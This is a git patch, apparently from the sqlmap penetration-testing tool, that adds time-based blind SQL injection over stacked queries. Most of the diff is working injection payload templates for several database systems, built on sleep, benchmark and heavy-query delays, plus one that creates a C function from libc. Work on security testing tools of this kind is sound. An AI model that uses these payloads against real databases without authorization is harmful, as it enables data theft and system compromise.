From f5ce739bdf1114ea6caa3e4795ae622a8e8c73d3 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 8 Dec 2010 23:52:31 +0000 Subject: [PATCH] Added support for time-based blind SQL injection via stacked queries too. Need to add vectors for some DBMS yet. --- lib/request/inject.py | 7 +- lib/techniques/blind/inference.py | 2 +- xml/payloads.xml | 115 +++++++++++++++++++++--------- 3 files changed, 88 insertions(+), 36 deletions(-) diff --git a/lib/request/inject.py b/lib/request/inject.py index 4a0b93792..6e46b7fbd 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -413,8 +413,11 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar) found = value or (value is None and expectingNone) - if time and kb.timeTest and not found: - kb.technique = PAYLOAD.TECHNIQUE.TIME + if time and (kb.timeTest or kb.stackedTest) and not found: + if kb.timeTest: + kb.technique = PAYLOAD.TECHNIQUE.TIME + elif kb.stackedTest: + kb.technique = PAYLOAD.TECHNIQUE.STACKED while len(kb.responseTimes) < MIN_TIME_RESPONSES: _ = Request.queryPage(content=True) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 142df3269..c8dc5399d 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -45,7 +45,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None partialValue = "" finalValue = "" asciiTbl = getCharset(charsetType) - timeBasedCompare = (kb.technique == PAYLOAD.TECHNIQUE.TIME) + timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) # Set kb.partRun in case "common prediction" feature (a.k.a. "good # samaritan") is used diff --git a/xml/payloads.xml b/xml/payloads.xml index 1ccad0ab0..b4447bd9d 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -161,7 +161,7 @@ Tag: SQL injections. Sub-tag: - #TODO + # TODO Sub-tag:
Which details can be infered if the payload succeed. @@ -172,7 +172,7 @@ Tag: Sub-tags: What is the database management system version (e.g. 5.0.51). - Sub-tags: + Sub-tags: What is the database management system underlying operating system. @@ -1206,6 +1206,7 @@ Formats: 0 0 1 + ; IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]); ; SELECT SLEEP([SLEEPTIME]); # @@ -1226,6 +1227,7 @@ Formats: 0 0 1 + ; IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]); ; SELECT BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')); # @@ -1245,6 +1247,7 @@ Formats: 0 0 1 + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); ; SELECT PG_SLEEP([SLEEPTIME]); -- @@ -1259,14 +1262,15 @@ Formats: - PostgreSQL < 8.2 stacked queries (heavy query) + PostgreSQL stacked queries (heavy query) 4 - 3 + 2 0 0 1 + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END); - ; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, [SLEEPTIME]000000)); + ; SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000); -- @@ -1274,7 +1278,6 @@ Formats:
PostgreSQL - < 8.2
@@ -1285,8 +1288,9 @@ Formats: 0 0 1 + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); - ; CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]); + ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]); -- @@ -1306,6 +1310,7 @@ Formats: 0 0 1 + ; WAITFOR DELAY '0:0:[SLEEPTIME]'; -- @@ -1325,6 +1330,7 @@ Formats: 0 0 1 + ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END; -- @@ -1344,6 +1350,7 @@ Formats: 0 0 1 + ; EXEC DBMS_LOCK.SLEEP([SLEEPTIME].00); -- @@ -1363,6 +1370,7 @@ Formats: 0 0 1 + ; EXEC USER_LOCK.SLEEP([SLEEPTIME].00); -- @@ -1382,6 +1390,7 @@ Formats: 0 0 1 + ; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))); -- @@ -1402,8 +1411,9 @@ Formats: 0 0 1 + - ; SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6; + ; SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6; -- @@ -1448,7 +1458,7 @@ Formats: 1 AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]) - AND BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) @@ -1459,15 +1469,35 @@ Formats: - PostgreSQL AND time-based blind (heavy query) + PostgreSQL > 8.1 AND time-based blind 5 - 1 + 2 1 1,2,3 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+ + + + PostgreSQL AND time-based blind (heavy query) + 5 + 3 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) @@ -1484,9 +1514,9 @@ Formats: 1 1,2,3 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) - AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) + AND [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) @@ -1522,9 +1552,9 @@ Formats: 1 1,2,3 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END) + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END) - AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) + AND [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) @@ -1561,9 +1591,9 @@ Formats: 1 1 1 - AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM]) + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM]) - AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) + AND [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) @@ -1585,10 +1615,9 @@ Formats: 3 1,2,3 2 - - OR IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])=0 + OR [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]) - OR SLEEP([SLEEPTIME])=0 + OR [RANDNUM]=SLEEP([SLEEPTIME]) @@ -1602,13 +1631,13 @@ Formats: MySQL < 5.0.12 OR time-based blind (heavy query) 5 - 3 + 4 3 1,2,3 2 OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]) - OR BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) @@ -1619,15 +1648,35 @@ Formats: - PostgreSQL OR time-based blind (heavy query) + PostgreSQL > 8.1 OR time-based blind 5 3 3 1,2,3 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+ + + + PostgreSQL OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3 + 2 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) @@ -1644,9 +1693,9 @@ Formats: 3 1,2,3 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END) - OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) + OR [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) @@ -1682,9 +1731,9 @@ Formats: 4 1,2,3 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END) + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END) - OR [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) + OR [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) @@ -1721,9 +1770,9 @@ Formats: 3 1 2 - OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM]) + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM]) - OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) + OR [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)